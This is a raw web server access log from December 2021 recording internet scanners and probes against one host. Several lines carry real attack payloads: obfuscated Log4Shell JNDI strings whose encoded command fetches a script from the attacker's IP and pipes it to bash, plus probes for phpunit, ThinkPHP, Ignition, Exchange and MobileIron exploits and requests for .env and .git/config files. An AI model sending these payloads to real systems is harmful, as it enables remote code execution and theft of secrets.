"-" [19/Dec/2021:11:46:49 +0000] 444 - GET https mx4.moralanimal.net "/" [Client 92.118.160.9] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [19/Dec/2021:12:00:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Dec/2021:12:18:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [19/Dec/2021:13:19:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.213.4] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Dec/2021:14:06:04 +0000] 444 - GET https ms1.moralanimal.net "/" [Client 92.118.160.1] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [19/Dec/2021:14:39:59 +0000] 444 - GET https 64.22.31.253 "/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [Client 195.54.160.149] [Length 0] [Gzip -] "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [19/Dec/2021:16:18:48 +0000] 444 - GET https mail2.moralanimal.net "/" [Client 92.118.160.5] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [19/Dec/2021:17:53:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.114] [Length 0] [Gzip -] "-" "-" [19/Dec/2021:17:53:14 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.114] [Length 252] [Gzip -] "-" "-" [19/Dec/2021:17:53:15 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.114] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [19/Dec/2021:19:59:39 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [19/Dec/2021:20:33:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 194.48.199.78] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.15" "-" [19/Dec/2021:21:13:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.233.62.116] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [19/Dec/2021:21:27:16 +0000] 400 - GET http 64.22.31.253 "/manager/text/list" [Client 198.199.104.59] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [19/Dec/2021:21:57:40 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.50.223] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [19/Dec/2021:22:37:03 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [19/Dec/2021:22:37:03 +0000] 400 - - http localhost "-" [Client 94.232.43.63] [Length 154] [Gzip -] "-" "-" [19/Dec/2021:23:06:08 +0000] 444 - GET https 64.22.31.253 "/owa/" [Client 128.1.248.42] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Dec/2021:00:13:06 +0000] 444 - GET https 64.22.31.253 "/hmc/hybris" [Client 51.158.156.78] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0" "-" [20/Dec/2021:01:02:36 +0000] 444 - POST https 64.22.31.253 "/" [Client 172.104.246.207] [Length 0] [Gzip -] "Mozila/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36" "-" [20/Dec/2021:01:03:26 +0000] 400 - GET http 64.22.31.253 "/api/v1" [Client 134.209.83.113] [Length 252] [Gzip -] "python-requests/2.22.0" "-" [20/Dec/2021:01:03:26 +0000] 444 - GET https 64.22.31.253 "/api/v1" [Client 134.209.83.113] [Length 0] [Gzip -] "python-requests/2.22.0" "-" [20/Dec/2021:01:03:54 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Dec/2021:01:04:55 +0000] 400 - GET http localhost "/" [Client 198.211.103.63] [Length 252] [Gzip -] "-" "-" [20/Dec/2021:01:07:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.71.139.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" [20/Dec/2021:02:19:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.190.116] [Length 0] [Gzip -] "-" "-" [20/Dec/2021:02:23:03 +0000] 400 - GET http 64.22.31.253 "/" [Client 192.241.212.103] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Dec/2021:02:36:37 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Dec/2021:04:04:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Dec/2021:04:08:10 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Dec/2021:04:19:21 +0000] 400 - POST http 64.22.31.253 "/" [Client 156.146.50.172] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36" "-" [20/Dec/2021:04:53:12 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [20/Dec/2021:05:46:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [20/Dec/2021:05:50:46 +0000] 444 - GET https mail8.moralanimal.net "/" [Client 92.118.160.17] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [20/Dec/2021:05:59:56 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.208.58] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Dec/2021:06:14:05 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [20/Dec/2021:06:14:05 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [20/Dec/2021:06:14:05 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [20/Dec/2021:06:45:19 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Dec/2021:07:14:57 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Dec/2021:07:17:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 103.203.57.29] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36" "-" [20/Dec/2021:07:17:07 +0000] 400 - GET http clientapi.ipip.net "/echo.php?info=20211220151707" [Client 103.203.57.29] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64)" "-" [20/Dec/2021:07:36:24 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Dec/2021:07:41:14 +0000] 444 - GET https jdownloader.moralanimal.net "/" [Client 92.118.160.9] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [20/Dec/2021:07:59:46 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.207.146] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Dec/2021:08:08:56 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.213.237] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Dec/2021:08:18:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Dec/2021:08:19:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Dec/2021:08:40:14 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.123] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [20/Dec/2021:09:27:16 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.211.144] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Dec/2021:09:29:28 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.213.120] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Dec/2021:09:30:40 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.200.235] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Dec/2021:09:33:44 +0000] 444 - GET https mx1.moralanimal.net "/" [Client 92.118.160.17] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [20/Dec/2021:09:52:26 +0000] 444 - GET https 64.22.31.253 "/solr/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Dec/2021:09:58:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Dec/2021:11:10:47 +0000] 444 - GET https 64.22.31.253 "/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [Client 195.54.160.149] [Length 0] [Gzip -] "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [20/Dec/2021:11:25:40 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [20/Dec/2021:11:25:40 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [20/Dec/2021:11:25:41 +0000] 400 - - http localhost "-" [Client 89.248.165.52] [Length 154] [Gzip -] "-" "-" [20/Dec/2021:11:29:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.134.116] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [20/Dec/2021:11:30:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.162.130] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [20/Dec/2021:11:31:02 +0000] 444 - GET https 64.22.31.253 "/" [Client 106.75.134.236] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" [20/Dec/2021:11:49:54 +0000] 400 - POST http 64.22.31.253 "/10196510" [Client 91.90.123.62] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36" "-" [20/Dec/2021:12:51:17 +0000] 400 - - http localhost "-" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [20/Dec/2021:13:23:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.212.249] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Dec/2021:14:26:04 +0000] 444 - GET https vmail.moralanimal.net "/" [Client 92.118.160.61] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [20/Dec/2021:14:45:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Dec/2021:16:12:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Dec/2021:16:29:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.35.168.80] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [20/Dec/2021:17:29:57 +0000] 444 - GET https 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [20/Dec/2021:18:56:15 +0000] 400 - GET http 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [20/Dec/2021:18:56:16 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 109.237.103.38] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [20/Dec/2021:19:22:42 +0000] 444 - GET https newmail.moralanimal.net "/" [Client 34.96.130.20] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [20/Dec/2021:19:43:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [20/Dec/2021:20:27:39 +0000] 444 - GET https antispam.moralanimal.net "/" [Client 34.86.35.7] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [20/Dec/2021:20:34:42 +0000] 444 - GET https mx1.moralanimal.net "/" [Client 34.86.35.7] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [20/Dec/2021:20:37:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 194.48.199.78] [Length 0] [Gzip -] "curl/7.64.1" "-" [20/Dec/2021:20:42:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.60] [Length 0] [Gzip -] "-" "-" [20/Dec/2021:20:42:37 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.60] [Length 252] [Gzip -] "-" "-" [20/Dec/2021:20:42:37 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.60] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [20/Dec/2021:20:42:52 +0000] 444 - GET https mail2.moralanimal.net "/" [Client 34.86.35.12] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [20/Dec/2021:20:49:46 +0000] 400 - GET http localhost "/" [Client 68.183.12.8] [Length 252] [Gzip -] "-" "-" [20/Dec/2021:20:55:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.43] [Length 0] [Gzip -] "-" "-" [20/Dec/2021:20:55:51 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.43] [Length 252] [Gzip -] "-" "-" [20/Dec/2021:20:55:51 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.43] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [20/Dec/2021:21:25:39 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Dec/2021:21:58:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 35.233.62.116] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [20/Dec/2021:22:07:41 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [20/Dec/2021:22:20:38 +0000] 400 - GET http 64.22.31.253 "/.git/config" [Client 109.237.103.118] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [20/Dec/2021:22:20:39 +0000] 444 - GET https 64.22.31.253 "/.git/config" [Client 109.237.103.118] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [20/Dec/2021:23:01:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.115] [Length 0] [Gzip -] "-" "-" [20/Dec/2021:23:01:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.60] [Length 0] [Gzip -] "-" "-" [20/Dec/2021:23:01:05 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.115] [Length 252] [Gzip -] "-" "-" [20/Dec/2021:23:01:06 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.60] [Length 252] [Gzip -] "-" "-" [20/Dec/2021:23:29:52 +0000] 444 - GET https mx4.moralanimal.net "/" [Client 34.96.130.24] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [21/Dec/2021:00:03:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Dec/2021:00:24:51 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Dec/2021:00:42:07 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [21/Dec/2021:01:08:28 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [21/Dec/2021:01:43:17 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.8 (KHTML, like Gecko) Chrome/6.0.397.0 Safari/533.8" "-" [21/Dec/2021:01:43:17 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 252] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.2; fr-lu; HTC Legend Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" [21/Dec/2021:01:43:17 +0000] 400 - - http localhost "-" [Client 222.186.19.235] [Length 154] [Gzip -] "-" "-" [21/Dec/2021:01:57:12 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Dec/2021:02:17:51 +0000] 444 - GET https agent.moralanimal.net "/" [Client 34.96.130.0] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [21/Dec/2021:02:33:10 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Dec/2021:03:04:36 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [21/Dec/2021:03:18:12 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Dec/2021:03:35:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Dec/2021:03:46:04 +0000] 444 - GET https 64.22.31.253 "/.env" [Client 103.133.109.163] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [21/Dec/2021:04:25:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.90.160.130] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [21/Dec/2021:04:27:56 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [21/Dec/2021:04:28:11 +0000] 444 - GET https mail8.moralanimal.net "/" [Client 34.77.162.4] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [21/Dec/2021:05:25:03 +0000] 400 - POST https localhost "-" [Client 195.54.160.149] [Length 154] [Gzip -] "-" "-" [21/Dec/2021:05:58:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 65.49.20.66] [Length 0] [Gzip -] "-" "-" [21/Dec/2021:06:01:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 195.54.160.149] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [21/Dec/2021:06:01:35 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.212.191] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Dec/2021:06:43:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 80.82.77.192] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" [21/Dec/2021:06:46:30 +0000] 400 - GET http 64.22.31.253 "/" [Client 80.82.77.192] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [21/Dec/2021:07:01:14 +0000] 400 - - http localhost "-" [Client 94.232.42.174] [Length 154] [Gzip -] "-" "-" [21/Dec/2021:07:20:21 +0000] 444 - GET https 64.22.31.253 "/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" [Client 195.54.160.149] [Length 0] [Gzip -] "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC82NC4yMi4zMS4yNTM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzY0LjIyLjMxLjI1Mzo0NDMpfGJhc2g=}" 